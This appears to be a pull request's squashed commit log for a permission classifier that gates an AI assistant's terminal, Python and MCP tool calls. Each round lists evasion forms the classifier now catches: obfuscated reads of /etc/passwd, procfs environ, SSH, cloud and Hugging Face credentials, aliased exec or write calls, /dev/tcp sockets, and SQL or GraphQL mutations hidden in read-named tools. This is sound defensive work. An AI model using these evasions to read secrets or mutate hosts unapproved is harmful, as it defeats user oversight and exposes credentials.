quoted/nested-variable assignments (p="/proc/$PPID"; cat $p/environ):
quotes are stripped and NAME=value prefixes expanded before the scan
- LESSOPEN/LESSCLOSE, which make less run an input preprocessor command
Python:
- os.chdir / os.fchdir, which move the cwd so a later relative read
escapes the sandbox workdir
- sensitive paths composed via a pathlib / chain (Path('/etc') / 'passwd')
or an f-string of literals (f'/proc/{pid}/environ')
- runpy (import) and runpy.run_path / run_module, which run arbitrary code
Adds classifier tests for each case.
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* Close auto-mode classifier gaps from review round 6 for PR #7079
Approve for me now asks for these:
- a mutating callable reached through a getattr alias
(rm = getattr(os, "remove"); rm("f")): calls through a getattr-bound
name fail closed
- compound MCP tool names carrying clone/checkout/comment/fork/tag/
invite/share, which start with a read verb but still mutate
- a sensitive path hidden behind a glob (cat /e??/passwd,
cat /e[t]c/passwd): a ? / * / [..] token is matched against the
sensitive-file set and bracket classes are de-obfuscated; benign
globs (ls *.py) stay auto
Also run first-pass RAG retrieval in off mode: like auto, off never
prompts, so a direct caller passing a stale confirm flag should not lose
document retrieval (both tool loops).
Adds classifier tests for each case.
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* Close auto-mode classifier gaps from review round 7 for PR #7079
Approve for me now asks for these:
- __builtins__.exec / __builtins__.eval (dynamic code via the dunder)
- terminal reads that hide a credential path behind a backslash escape
(cat /et\c/passwd)
- read-named MCP filesystem calls pointed at a credential path
(mcp__fs__read_file {"path": "/etc/passwd"})
- compound MCP names carrying append / prepend
- open aliased through a subscript or builtins attribute
(f = globals()["open"]; f = builtins.open) then called to write
- open(..., **{"mode": "w"}) where a kwargs splat hides the write mode
- a sensitive path with a dynamic segment (open(f"/etc/{name}"),
os.path.join("/etc", name)); /tmp/{name} stays auto
- urllib3 networking
Also stop folding permission_mode ask/auto into confirm_tool_calls for
external-provider requests: that branch rejects confirm_tool_calls with
tools, and the mode only governs local tool calls. Local requests still
self-gate. Adds tests for each case.
* Close auto-mode classifier gaps from review round 8 for PR #7079
Approve for me now asks for these:
- dbm on the unsafe-module list: dbm.open(file, "c"/"n") creates files,
and importing the family signals a persistence writer
- reads of ~/.azure and ~/.config/gh credential stores (Azure/GitHub
tokens), in terminal, MCP arguments, and Python literals
- compound MCP names carrying upsert / assign
Adds classifier tests for each case.
* Gate secret mounts and fix the composer pill count for PR #7079
- Add Docker/Kubernetes secret mount dirs (/run/secrets,
/var/run/secrets) to the sensitive-path checks, so Approve for me asks
before reading injected credentials (terminal, MCP args, Python).
- Count the always-visible permission pill in the composer's compact
threshold so labels collapse at the intended width instead of
overflowing by one pill.
Adds classifier tests for the secret mount paths.
* Close auto-mode classifier gaps from review round 10 for PR #7079
Approve for me now asks for these:
- qualified pathlib constructors (pathlib.Path('/etc') / name), folded
the same as bare Path(...), so a dynamic sensitive path is detected
- open aliased through an annotated assignment (f: object = open;
f('out', 'w')), tracked like a plain assignment
- recursive searches rooted at an absolute path (grep -R TOKEN /home,
rg TOKEN /, fd pattern /etc), which read host files outside the
sandbox tree; sandbox-relative searches stay auto
Adds classifier tests for each case.
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* Close auto-mode classifier gaps from review round 11 for PR #7079
Approve for me now asks for these terminal reads, which bash would
expand into a sensitive path only after the classifier had approved:
- a glob that resolves into a secret mount or credential dir
(cat /r?n/secrets/hf_token, cat /root/.s??/id_rsa)
- a recursive search rooted at a tilde home (grep -R TOKEN ~root,
grep -R TOKEN ~/logs)
- a brace expansion that builds a credential path (cat /etc/pass{w,}d)
- a default/alternate parameter expansion that builds one
(cat /etc/pass${x:-wd})
- an input redirection that hides a glob (cat </e??/passwd)
And these python calls:
- a str.format-built sensitive path (open('/etc/{}'.format('passwd')))
- writer methods that persist to disk without open() (numpy.save,
Image.save, plt.savefig, DataFrame.to_csv, json.dump)
Segment-wise directory matching keeps benign globs (ls /home/*/projects)
auto. Adds regression tests for each case and its safe counterpart.
* Close auto-mode classifier gaps from review round 12 for PR #7079
Approve for me now asks for these too:
- a terminal read whose parent traversal hides behind a redirection with
no following space (cat <../../notes)
- a python read whose path is built with str.join
(open(''.join(['/etc', '/passwd']))), told apart from os.path.join
- a dynamic-code builtin reached through an alias
(from builtins import eval as e; e(...); x = builtins.exec; x(...))
Adds regression tests for each case and its safe counterpart.
* Close auto-mode classifier gaps from review round 13 for PR #7079
Approve for me now asks for these too:
- a recursive search whose root is hidden behind an assignment
(p=/; grep -R TOKEN $p): the recursive-root test now runs on the
assignment-expanded tokens as well
- a python read whose sensitive path is split through a literal variable
(base = '/etc'; open(base + '/passwd')), including via an f-string
- numpy ndarray.tofile, which persists without open()
- a sequence brace read (cat /etc/pass{w..w}d), expanded alongside the
comma brace form before the sensitive-path scan
Adds regression tests for each case and its safe counterpart.
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* Close auto-mode classifier gaps from review round 14 for PR #7079
Approve for me now asks for these python reads that assemble a sensitive
path in a form the fold did not yet recognize:
- a pathlib object reused through a name (p = Path('/etc'); p / 'passwd')
- old-style percent formatting ('%s/%s' % ('/etc', 'passwd'))
- Path.joinpath ('/etc'.joinpath('passwd'))
- a bytes path literal (open(b'/etc/passwd'))
And these terminal reads, which bash expands into a sensitive path only
after the classifier had approved:
- a substring parameter expansion off an assignment
(p=passwd; cat /etc/${p:0:6})
- an ANSI-C quoted path (cat $'/etc/pass\x77d')
- a glob into an Azure or GitHub CLI config dir
(cat /home/*/.az?re/..., cat /home/*/.config/g?/...)
Adds regression tests for each case and its safe counterpart.
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* Close auto-mode classifier gaps from review round 15 for PR #7079
Approve for me now asks for these terminal reads, which bash expands into
a sensitive path only after the classifier had approved:
- a per-thread procfs env alias (cat /proc/$PPID/task/$PPID/environ)
- a recursive root behind a default parameter (grep -R TOKEN ${root:-/home})
- a path built by pattern replacement (p=passXd; cat /etc/${p/X/w})
And these python reads:
- a pathlib .parent/.parents chain that escapes the session workdir
((Path.cwd().parent / 'other' / 'notes').read_text())
- a sensitive path resolved through glob (glob.glob('/e??/passwd')[0])
Adds regression tests for each case and its safe counterpart.
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* Close auto-mode classifier gaps from review round 16 for PR #7079
Approve for me now asks for these terminal reads, which bash expands into
a sensitive path only after the classifier had approved:
- a case-modifying parameter expansion (p=PASSWD; cat /etc/${p,,})
- a mutating find action hidden behind an assignment (f=-delete; find . $f)
- a glob assembled through an assignment (g=e??; cat /$g/passwd)
- a POSIX bracket class glob (cat /etc/pass[[:lower:]]d)
And these python reads/writes:
- a glob pattern folded from a literal variable
(base='/e??'; glob.glob(base + '/passwd'))
- a directly imported os.path.join (from os.path import join; join('/etc', 'passwd'))
- a directly imported writer (from numpy import save; save(...))
- an aliased pathlib constructor (from pathlib import Path as P; P('/etc') / 'passwd')
The find/fd and glob scans now run on the assignment/parameter-expanded
command, and pathlib/join/writer import aliases are tracked. Adds
regression tests for each case and its safe counterpart.
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* Close auto-mode gaps from review round 17 for PR #7079
Two fixes:
- Gate sqlite3 in auto mode. sqlite3.connect(path) creates or mutates a
database file (and runs DDL/DML) with no open()/writer attribute for
the AST checks to catch, so treat the module like dbm and ask.
- Only self-enable confirm_tool_calls for Studio's own tool loop. The
ask/auto fold previously set confirm on every non-provider request,
including a plain client-tool passthrough (client-supplied tools that
Studio does not execute), which then tripped the local-tool
streaming-confirm route guard and rejected the passthrough. Restrict
the fold to requests that actually ask Studio to run tools
(enable_tools / enabled_tools / mcp_enabled).
Adds regression tests for the sqlite3 write and for the passthrough vs
tool-loop confirm behavior.
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Classifier (auto mode asks for these):
- os.open through a module alias (import os as o; o.open(...)); os/posix
aliases are tracked like the literal module name.
- less/more pagers, whose escapes (+cmd, !shell, -o/--log-file, LESSOPEN)
can run a command or write a file the command-name allowlist cannot
see, so they are no longer auto-approved.
- a read-named MCP tool carrying a mutating query
(query_database {"query": "DELETE FROM runs"}); DML/DDL statements are
matched as whole statements so a natural-language query that merely
contains "delete" stays safe.
- ML persistence helpers (save_pretrained / save_file / save_model /
save_weights / save_lora / save_checkpoint) that export weights to disk.
Route:
- Honor CLI-forced tools when deriving the confirm gate. When a process
policy (unsloth run --enable-tools) opens the local tool loop without a
request-level tool signal, a permission_mode ask/auto request now
derives confirm at the route (GGUF and safetensors paths) so the mode
still gates the call, and a non-streaming ask/auto request is rejected
rather than running unprompted. A plain client-tool passthrough (no
local loop) is unaffected.
Adds regression tests for each case and its safe counterpart.
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* Close auto-mode classifier gaps from review round 19 for PR #7079
Approve for me now asks for these too:
- a terminal read whose path is built by indirect parameter expansion
(x=passwd; p=x; cat /etc/${!p})
- a bash /dev/tcp or /dev/udp redirection, which opens a network socket
(cat </dev/tcp/host/port)
- a python read via pathlib's receiver-plus-pattern glob
(Path('/etc').glob('passw?'))
- a python read whose sensitive root passes through a normalizer
(os.path.abspath('/etc'), Path('/etc').resolve())
- a pickle-backed loader that can execute code on load
(torch.load, joblib.load, pandas.read_pickle), tracked through module
import aliases
- compiled code wrapped into a callable (compile(...) + types.FunctionType)
Adds regression tests for each case and its safe counterpart.
* Honor unset permission_mode as ask across the local tool loop for PR #7079
Three gaps where an omitted permission_mode did not behave as the
documented default ("ask"):
- The frontend only sent permission_mode / confirm_tool_calls /
bypass_permissions when a tool pill was on. A process policy
(unsloth run --enable-tools) can open the tool loop with no pill, so
the backend never saw the selected gate. Send the three permission
fields at the top level of every local chat payload instead.
- The backend read payload.confirm_tool_calls directly at the
pre-switch guard and both late per-backend derivations, so an unset
mode fell through as no-gate even for an explicit ask/auto. Add
_permission_mode_confirm(payload): explicit confirm_tool_calls wins,
explicit ask/auto engage the gate, off/full never prompt, and an
unset mode defaults to ask only where realizable (streaming), keeping
the legacy no-gate run for non-streaming unset requests.
- A forced ask/auto tool loop (CLI --enable-tools) with no stream now
400s at the pre-switch guard before evicting the resident model,
matching the existing confirm-without-stream rejection.
Adds test_permission_mode_confirm_derivation covering the derivation
truth table.
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* Declare permission_mode and bypass_permissions on the local chat request type
The previous change moved permission_mode, confirm_tool_calls and
bypass_permissions to the top level of the local chat payload. They had
lived inside a conditional spread, which is not subject to excess
property checking, so the fields were never declared on
OpenAIChatCompletionsRequest. At the top level tsc flagged
permission_mode as unknown (TS2322), failing the frontend build and
every job whose Studio install builds the frontend.
Add permission_mode and bypass_permissions to the request interface
(confirm_tool_calls was already present).
* Close auto-mode classifier gaps from review round 21 for PR #7079
Auto mode ("Approve for me") now asks for these too:
- a pathlib read built from a concrete constructor (PosixPath, WindowsPath
and their Pure* forms), which the folder previously ignored so
PosixPath('/etc') / 'passwd' lost its /etc root and ran unprompted
- a terminal or python read of the ssh host keys under /etc/ssh, which
the sensitive-path regex only covered for passwd/shadow/sudoers
- a read whose path variable is reassigned: the whole-tree pre-scan kept
the last binding, so base = '/etc'; open(base + '/passwd'); base = 'data'
folded to data/passwd and ran even though execution reads /etc/passwd;
any multiply-bound name now folds to the escape sentinel and asks
Also stop the pre-switch guard from rejecting a plain client-tool
passthrough. permission_mode only implies the confirm gate for Studio's
own local tool loop (enable_tools / enabled_tools / mcp_enabled); a
non-streaming client-tool passthrough that carries permission_mode
ask/auto (confirm_tool_calls left unset by the validator) must forward to
the provider branch. Only an explicit confirm_tool_calls=True still forces
the local-confirm rejection there.
Adds regression tests for each case and its safe counterpart.
* Fix permission-pill compaction count and Full-access confirm sync for PR #7079
Two frontend consistency issues in the permission-level UI:
- The composer collapses tool pills to icons above four, but the count
left out the permission pill, which renders in every mode except off.
With one optional pill also shown the row reached five pills without
collapsing and could overflow. Count the pill when it is visible
(permission_mode != off).
- Entering Full access via setPermissionMode('full') or
setBypassPermissions(true) left confirmToolCalls at its previous value,
so a Full-access run (which sends confirm_tool_calls=false) could still
report confirmations as enabled in response metadata. Set
confirmToolCalls false at both entry points.
* Close auto-mode classifier gaps from review round 23 for PR #7079
Auto mode ("Approve for me") now asks for these too:
- a command using an abbreviated GNU long option that reaches a
write/exec action (sort --out= for --output, env --ch= for --chdir,
fd --base-dir= for --base-directory); a prefix of an unsafe long flag
now fails closed
- printf -v NAME, which assigns to a shell variable, so
printf -v PATH %s .; ls can rewrite PATH and run ./ls unprompted
- fd --base-directory / --search-path, which move the search root
outside the session workdir without any positional slash token
- an MCP tool whose compound read name carries a copy-style mutator
(read_and_copy_file, get_and_snapshot_volume): copy, duplicate,
import, export, download, backup, restore, snapshot, mirror
Also treat an omitted permission_mode as its documented default ("ask")
on the Anthropic Messages server-tool path. That branch has no
confirmation channel and already rejects explicit ask/auto, so an
omitted mode now falls into the same rejection instead of silently
running server tools unprompted, unless the caller opted out with
confirm_tool_calls=false (the legacy equivalent of "off"). off/full and
that opt-out still run; the two routing tests that relied on the old
implicit run now set permission_mode="off".
Adds regression tests for each case and its safe counterpart.
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* Refine permission gating from review round 24 for PR #7079
Four fixes from the latest review:
- Anthropic Messages server tools: an omitted permission_mode no longer
rejects a request that only runs safe server tools (web_search), so
existing Anthropic callers keep working. It still rejects an omitted
mode when a local tool (terminal/python) is selected, and an explicit
ask/auto is still rejected outright. off/full and a
confirm_tool_calls=false opt-out always run.
- Pre-switch confirm-without-stream guard: use
_explicit_studio_tool_loop_requested (the same predicate the
passthrough router uses) instead of the policy-inclusive
_effective_enable_tools, so a process --enable-tools policy no longer
turns a client-tool passthrough into a local-loop rejection.
- Auto mode now asks for `uniq INPUT OUTPUT`: uniq writes its second
file positional, so a second positional (numeric flag values skipped)
is treated like `sort -o`. A lone `uniq file` or piped `... | uniq`
stays safe.
- MCP mutation check now strips SQL comments before matching, so
DELETE/**/FROM and UPDATE/**/users (comment-as-whitespace) no longer
slip past the DML/DDL denylist.
Adds regression tests for each case and its safe counterpart.
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* Close auto-mode gaps from review round 25 for PR #7079
Auto mode ("Approve for me") now asks for these Python cases too:
- a bare archive constructor with a write mode (from zipfile import
ZipFile; ZipFile('out.zip', 'w')), tracked through import aliases like
the zipfile.ZipFile attribute call already was
- a dynamic lookup aliased through getattr (g = getattr;
rm = g(os, 'remove'); rm('file')), not just direct getattr(...) calls
- a callable that wraps open or a writer via functools.partial
(w = partial(open, mode='w'); w('out.txt')), which hides the write mode
Also:
- Always-safe tools (render_html) stream their early provisional canvas
card in auto mode again. The provisional-card guard mirrored the raw
confirm flag, which suppressed the early card under Approve-for-me; it
now reuses the auto-mode safety decision (is_always_safe_tool).
- The assistant-ui composer no longer counts the permission pill toward
its collapse threshold when the level is Off (the pill renders null
there), matching the other composer.
Adds regression tests for each case and its safe counterpart.
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* Align permission-mode confirm guards with the router (review round 26)
Three pre-switch confirm-gate checks disagreed with how the tool
loop actually enters, so a valid request could 400 (or an invalid
one could evict the resident model) at the wrong point:
- The /chat/completions pre-switch guard only looked at explicit
request fields, so a process --enable-tools policy that forces the
loop on (request omits enable_tools, no client tools) slipped past
it and only 400ed after _maybe_auto_switch_model had swapped the
model. It now mirrors the router's own loop-entry gate
(_effective_enable_tools or mcp, tool_choice="none" disabling it
unless explicitly asked) while still deferring to client-tool
passthrough, so the policy-forced case is caught before the switch.
- The ChatCompletionRequest full/off fold treated enabled_tools by
itself as a local-loop request and set confirm_tool_calls=True.
The router never starts the loop on enabled_tools alone (it only
filters which tools run), so a non-streaming passthrough carrying
client tools plus enabled_tools 400ed instead of routing verbatim.
The fold now keys off the same enable_tools / mcp_enabled signals.
- The Anthropic /v1/messages unsupported-mode rejection (ask/auto,
or an omitted mode selecting terminal/python) ran inside the
post-switch server-tools block, so an invalid request evicted the
resident model before the 400. It now runs before the auto-switch,
determined from the requested server tools, like the neighboring
malformed- and mixed-tool guards.
Adds regressions for each: a policy-forced non-streaming ask/auto
guard rejection that never reaches the switch, an enabled_tools-only
passthrough that keeps confirm unset, and an Anthropic rejection that
precedes _maybe_auto_switch_model.
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* Close auto-mode classifier gaps from review round 27 for PR #7079
Auto mode ("Approve for me") now asks for these host-mutating or
host-reading cases it previously ran unprompted (the sandbox does not
jail filesystem reads, and terminal commands can change host state):
- Destructured string literals fold into the scanned path now, so
base, leaf = ('/etc', 'passwd'); open(base + '/' + leaf).read()
resolves to /etc/passwd and asks, like the single-assignment form
already did. The tuple/list unpacking branch tracked only aliases to
open; it now also binds literal and folded-path elements.
- pathlib name rewrites fold to the rewritten path:
Path('/etc/x').with_name('passwd').read_text() (and with_stem /
with_suffix) spell no literal /etc/passwd but resolve to it, so they
are folded and caught. Benign in-sandbox rewrites stay safe.
- hostname NAME (or -F/--file, -b/--boot) sets the hostname, so a
positional or a set flag asks; bare hostname and the display flags
(-f/-i/-I/...) stay read-only.
- date -s/--set STRING and the bare MMDDhhmm... positional set the
system clock and now ask; the display forms stay read-only (+FORMAT,
-u/-R, and -d/-r/-f whose following value is skipped so date -d
tomorrow is not mistaken for a clock-setting positional).
Adds regression rows for each gap and its safe counterpart.
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* Close more auto-mode classifier gaps from review round 28 for PR #7079
Auto mode ("Approve for me") now asks for these cases too:
- Mapping-style %-formatted paths. '/etc/%(f)s' % {'f': 'passwd'} folds
to /etc/passwd and asks; a dynamic value or a non-literal mapping
leaves the NUL marker so /etc/<dynamic> still fails closed. The path
folder previously handled only tuple/scalar % right-hand sides and
returned None for a dict, hiding the sensitive segment.
- A read-named MCP database tool carrying PostgreSQL COPY. COPY ... FROM
bulk-loads a table and COPY ... TO writes a server-side file, so both
are matched as mutating queries like DELETE/UPDATE already were. A
'copy' substring in a column name stays safe (word boundary).
- logging file handlers. logging.FileHandler('out.log', mode='w') (and
the default append mode, RotatingFileHandler/TimedRotatingFileHandler/
WatchedFileHandler, and the bare from-import form) create or truncate
a file like open(..., 'w'), so they are classified as writer calls.
StreamHandler / NullHandler and logging reads stay safe.
Adds regression rows for each gap and its safe counterpart.
* Fix writer aliases, GraphQL mutations, and auto server tools (review round 29)
- Auto-mode Python: an aliased writer or archive constructor is tracked
like the existing open alias, so from numpy import save; s = save;
s('out.npy', arr) (and z = ZipFile; z('a.zip', 'w'), incl. the
destructured forms) ask instead of running the write unprompted. A
benign builtin alias (x = len) stays safe.
- Auto-mode MCP: a read-named tool carrying a GraphQL mutation now asks.
query_graphql {"query": "mutation { deleteIssue(id: 1) }"} matches a
leading mutation keyword (GraphQL uses # comments, so it scans the raw
payload); GraphQL read queries stay safe.
- Anthropic /v1/messages: permission_mode "auto" no longer 400s a
safe-only server-tool selection. auto only needs a confirmation
channel for an unsafe call, so like the omitted default it runs for
web_search / RAG / render and rejects only when a gate-needing local
terminal/python tool is selected. ask still always rejects (it asks
per call, which this passthrough cannot honor). The rejection stays
ahead of the model auto-switch.
Adds regression rows/cases for each.
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* Gate asyncio spawn, net clients, default-captured open; allow safe-only auto (round 30)
Auto-mode Python now asks for more process/network/write vectors:
- asyncio process spawners (asyncio.create_subprocess_exec/shell and a
loop's subprocess_exec/shell) run an arbitrary program without the
terminal blocklist, so they gate like os.system/subprocess.
- stdlib network clients imaplib / poplib / nntplib / xmlrpc(.client) /
webbrowser open outbound connections the sandbox does not namespace
off, so their import asks like the other network modules.
- a callable captured as a function or lambda parameter default
(def f(o=open): o('out', 'w')) now binds that parameter into the same
alias set, so the later write through it is gated. A benign default
(o=len) stays safe.
Also, permission_mode "auto" no longer 400s a non-streaming local tool
request whose selection is always-safe-only (web_search / RAG / render).
auto only prompts for a classifier-flagged call, so a safe-only auto
request needs no stream, while ask, an explicit confirm_tool_calls=true,
MCP, and an unrestricted or unsafe selection still require it. Applied
via a shared _confirm_gate_needs_stream helper at the pre-switch, GGUF,
and safetensors confirm-stream guards; the loop's per-call confirm flag
is unchanged.
Adds regression rows/cases for each.
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* Catch brace-glob paths and attribute writer aliases; unfold auto (round 31)
- Terminal auto mode now runs the glob-sensitive scan over every
expansion candidate, so a brace-expanded glob (cat /e{t,}c/pass?d,
which bash expands to /etc/pass?d and then globs to /etc/passwd) asks.
Brace expansion alone spells no literal /etc/passwd and the glob only
resolves once the brace group is expanded, so scanning both together
is required. A benign brace + glob stays safe.
- Python auto mode now tracks a mutating attribute captured as a plain
name: s = np.save; s('out.npy', arr) binds a writer alias, a captured
.open bound method (p = Path('out').open; p('w')) fails closed on any
call since its mode position varies, and z = zipfile.ZipFile is gated
like the bare import. A benign attribute alias (x = np.mean) stays safe.
- permission_mode "auto" is no longer folded to confirm_tool_calls=true
on the request model. Folding it defeated the safe-only-selection
exception in _confirm_gate_needs_stream (an explicit confirm forces
stream=true), so a non-streaming safe-only auto request was rejected.
Leaving it unset lets the route apply the exception; the mode still
drives the loop's per-call gate. "ask" still folds (it gates every
call).
Adds regression rows/cases for each.
* Harden SQL/GraphQL/writer classification and passthrough guards (round 32)
MCP argument mutation detection (read-named query tools):
- CREATE DDL now matches modifiers and the broader object set, so
CREATE OR REPLACE VIEW, CREATE UNIQUE INDEX, CREATE TEMP TABLE,
CREATE MATERIALIZED VIEW and CREATE FUNCTION ask.
- Stored-procedure invocation (CALL proc(...), EXEC/EXECUTE) and VACUUM
ask; a natural-language "call me back" stays safe via the trailing
"(" / ";" / end lookahead.
- GraphQL # comments are stripped before the mutation match, so
mutation # note\n { deleteIssue(id: 1) } no longer hides the mutation.
Python auto-mode classification:
- numpy.memmap / open_memmap and pandas ExcelWriter / HDFStore create or
truncate a file on construction, so they gate like open(..., "w").
- asyncio networking (asyncio.open_connection, loop.create_connection /
create_server and unix variants) opens outbound connections/listeners
the sandbox does not isolate, so it gates like socket.connect.
Terminal auto-mode: file -C / --compile writes a compiled magic database.
Routing:
- A JSON-schema response_format is guided-decoding passthrough, not a
local tool loop, so a --enable-tools policy no longer 400s a
non-streaming ask/auto structured-output request at the confirm guard.
- An explicit confirm_tool_calls=False opts out of the Anthropic Messages
server-tool gate entirely (it wins over the mode, mirroring
_permission_mode_confirm and the GGUF path), so it runs even under ask.
Adds regression rows/cases for each.
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* Track path-ctor aliases, exempt empty selection and safe safetensors card (round 33)
- Python auto mode now propagates path constructor / join aliases, so
assigning Path or os.path.join to another local name is still folded:
P = Path; (P('/etc') / 'passwd').read_text() and j = os.path.join;
open(j('/etc', 'passwd')) ask, while a benign /tmp alias stays safe.
- _confirm_gate_needs_stream now distinguishes an omitted enabled_tools
(None, all tools) from an explicit empty list ([], no tools). An empty
selection runs no built-in tool and cannot prompt, so a non-streaming
auto request with enable_tools=true, enabled_tools=[] is no longer
400ed under a --enable-tools policy.
- The safetensors provisional render_html card now uses permission_mode:
render_html is always safe and never prompts, so its early canvas card
streams under auto (which ships confirm_tool_calls=true) instead of
being suppressed, matching the GGUF path's is_always_safe_tool exemption.
Adds regression rows/cases for each.
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* Extend auto-mode classifier: SQLite mutations, more net/xattr/compressed writers
Additional fail-closed gaps found by a fresh adversarial pass, each with a
reproduction and a benign control:
- MCP read-named tools now ask on SQLite-flavored writes the base DML/DDL regex
missed: ATTACH / DETACH DATABASE, a write-form PRAGMA (PRAGMA journal_mode=WAL
/ user_version=42 / foreign_keys(0), while the read-form PRAGMA journal_mode
stays safe), and load_extension() which loads and runs an arbitrary shared
library.
- Python auto mode now gates the remaining asyncio network entry points
(start_server, open_unix_connection, loop.create_datagram_endpoint,
sock_connect), os.setxattr / os.removexattr metadata writes, the gzip / bz2 /
lzma single-stream writers (GzipFile / BZ2File / LZMAFile, mode-gated like
ZipFile so a read stays safe), pandas to_xml, and the websockets client.
Benign controls (SELECT 1, read-form PRAGMA, asyncio.sleep, gzip read, numpy
read, natural-language "attach"/"analyze") stay safe. Regression rows added to
test_permission_mode.py.
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* Close follow-up auto-mode gaps: SQLite/GraphQL variants, more writers and net
A fresh adversarial pass on the previous round found consistent extensions of
the same fail-closed rules, each reproduced with a benign control:
- MCP read-named tools: DROP / ALTER now cover the same broad object set as
CREATE (DROP FUNCTION, ALTER INDEX, DROP MATERIALIZED VIEW); ATTACH is caught
without the optional DATABASE keyword via its quoted-path form; a
schema-qualified write PRAGMA (PRAGMA main.user_version=1) is matched; and a
GraphQL mutation carrying directives (mutation M @audit { ... }) is treated as
a mutation.
- Python auto mode: os.startfile (Windows program launch), asyncio
start_unix_server, and the socketserver framework now ask; a gzip/bz2/lzma
open imported under an alias (from gzip import open as gopen) is gated like
builtin open; and a dynamic path prefix that can form a sensitive absolute
root (open(chr(47) + "etc/passwd"), open(os.sep + "etc/passwd")) is treated as
sensitive, while a dynamic prefix with a benign suffix stays safe.
Benign controls (read-form PRAGMA, natural-language "attach ... as", "drop the
idea", SELECT dropped_at, query @cached, gzip read alias, dynamic prefix +
data/file suffix) stay safe. Regression rows added to test_permission_mode.py.
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* Gate GNU time -o, basicConfig/methodcaller/fileinput, and more SQL mutations
Another adversarial pass surfaced further consistent fail-closed gaps, each
reproduced with a benign control:
- Terminal: GNU time -o/--output/-a/--append truncate or append to a file with
timing output; time is a wrapper, so the flag is checked before the wrapped
command like env -C.
- Python auto mode: logging.basicConfig(filename=...) opens a log file for
write; operator.methodcaller("write_text"/...) hides a writer method behind a
string and is now treated as dynamic dispatch (like getattr/partial);
fileinput.input(..., inplace=True) rewrites a file in place (the default read
form stays safe).
- MCP read-named tools: UPDATE now matches quoted, bracketed, and
schema-qualified targets (UPDATE "users" / public.users / ONLY public.users /
[users] / `users` SET); SELECT ... INTO OUTFILE/DUMPFILE writes a server file;
and state-changing SQL functions inside a SELECT (pg_terminate_backend,
setval, pg_write_file, lo_export, ...) ask.
Benign controls (time ls / time -p, basicConfig(level=), methodcaller("upper"),
fileinput read, NL "update ... set", setval_col column, PL/pgSQL SELECT INTO
var) stay safe. Regression rows added to test_permission_mode.py.
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* Tighten auto-mode classifier comments
Collapse the multi-line rationale blocks in the permission classifier to one or
two lines each without dropping the exploit each branch closes. Comments and
whitespace only (no code change); the classifier tests are unchanged and pass.
* Retry transient SSE stalls in the tool-calling smoke probes
The tool-calling job flaked with a bare "TimeoutError: timed out": the
server-side python/bash probes stream over post_sse(), which (unlike
post()) had no transport-level retry, so a single stalled stream on a
shared CI runner hard-failed the whole step even though function calling
had already passed.
post_sse() now mirrors post(): a transport-level stall (stream open or a
mid-stream read timing out) is retried once with a fresh request capped
at 300s, while HTTP status errors still surface immediately. The
Linux _run_tool_probe caps each attempt at 360s and treats a stall that
outlives the retry as a failed attempt (rotate to the next seed) instead
of raising, and the web_search probe uses the same 360s cap. A genuine
server wedge still fails (the retry also times out), so real regressions
are not masked. Applied to the Linux, macOS, and Windows inference-smoke
workflows, which share the probe.
* Close five more auto-mode classifier gaps from review
Each reproduces with a benign control:
- Path constructor aliased through an attribute (P = pathlib.Path) now folds
like the bare-name alias, so (P('/etc') / 'passwd').read_text() asks while a
/tmp alias stays safe.
- Callable defaults that are not plain names now bind the parameter: an
attribute writer (def f(s=np.save)), an archive constructor, a captured .open,
and partial(open, mode='w') fold like the equivalent assignment; a benign
default (np.mean) does not.
- A dynamic piece inside a sensitive name (open('/et' + chr(99) + '/passwd'),
which folds to '/et\x00/passwd') now asks: the literals around each dynamic
segment are matched against a credential target with the segment as any run of
non-separator chars, so an all-dynamic ('1 + 1') or segment-spanning
(a + '/' + b) path stays safe.
- MCP read-named tools now ask on REFRESH MATERIALIZED VIEW and REINDEX; a
'refresh' column or natural-language 'refresh' stays safe.
- A writer/open alias handed to a higher-order invoker (map(open, names, modes),
starmap(np.save, ...)) is gated even without a direct call site; a benign
map(len, ...) is unaffected.
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* Default tool pills off on model load so tool execution is opt-in
resolveToolsEnabledOnLoad turned the web-search and code pills on for
any tool-capable model when the user had expressed no preference. Default
them off instead, so tool execution is enabled only when the person
clicks the pill to turn it on; a saved preference (on or off) is still
honoured, so a user who already enabled tools keeps them on.
* Gate mark/subscribe MCP verbs and qualified higher-order writer invokers
- A read-prefixed MCP tool name carrying mark / subscribe / unsubscribe
(get_and_mark_read, get_and_subscribe) now asks; a 'mark' substring inside
one token (list_bookmarks) stays safe.
- The higher-order writer check now also fires for a qualified invoker
(itertools.starmap(open, ...), functools.reduce(open, ...)), matching the
bare-name map/filter form; the writer-check on the first arg keeps a benign
itertools.starmap(len, ...) or itertools.chain(...) safe.
Regression rows added to test_permission_mode.py.
* Close more auto-mode gaps and align the ask confirm fold across paths
Each classifier change reproduces with a benign control:
- MCP read-named tools now ask on reply / notify verbs (get_and_reply_email,
list_and_notify_users), on catalog writes COMMENT ON / SECURITY LABEL / LOCK
TABLE and CREATE|DROP|ALTER POLICY, and on state-changing PostgreSQL functions
inside a read-shaped SELECT (nextval, set_config, pg_notify, the advisory-lock
family). A 'comment' column, a 'locks' table, and a 'nextval' column prefix
stay safe; the natural-language NOTIFY/SET ROLE statement forms are left out
because SET/NOTIFY overlap ordinary prose.
- Python auto mode now gates loader.exec_module (runs a module's code), archive
extractall (zip-slip file writes), the ensurepip / venv modules (install pip /
build an environment), and pydoc.writedoc. The Hugging Face login token
(~/.cache/huggingface/token and stored_tokens) is now a sensitive path, while
the rest of that cache (model data) stays readable.
- ChatCompletionRequest no longer overwrites an explicit confirm_tool_calls=false
when permission_mode='ask': the fold only self-enables the gate when the flag
is unset, so an explicit opt-out wins on the chat path exactly as it already
does via _permission_mode_confirm and the Anthropic pre-switch guard.
Regression rows added to test_permission_mode.py.
* Gate sort -T, xxd outfile positional, and the legacy HF token path
- sort -T / --temporary-directory writes spill files to a caller-chosen dir,
so it joins -o / --output in sort's unsafe-flag set.
- xxd [infile [outfile]] writes its second positional, like uniq; xxd now uses
the same second-positional-write handling (xxd in.bin out.hex asks, xxd
in.bin and xxd -c 16 in.bin stay read-only).
- The sensitive-path regex now also covers the legacy ~/.huggingface/token
location (optional leading dot), not just ~/.cache/huggingface/token; an
unrelated dir like myhuggingface/token stays safe.
Regression rows added to test_permission_mode.py.
* Catch multi-char SQL mutation targets, globbed credential names, digit outfiles
Three fail-open gaps in the auto-mode classifier, each with a benign control:
- SQL: the trailing word boundary on the MCP mutation regex meant a bare \w
stopped at the first character, so TRUNCATE users, GRANT SELECT ON t, and
REVOKE ALL ON t (multi-character names) slipped through while single-letter
targets matched. Match the whole identifier instead, and accept an explicit
AS alias on UPDATE (UPDATE users AS u SET). The implicit-alias form is left
out because it is indistinguishable from the prose "update <noun> <noun> set".
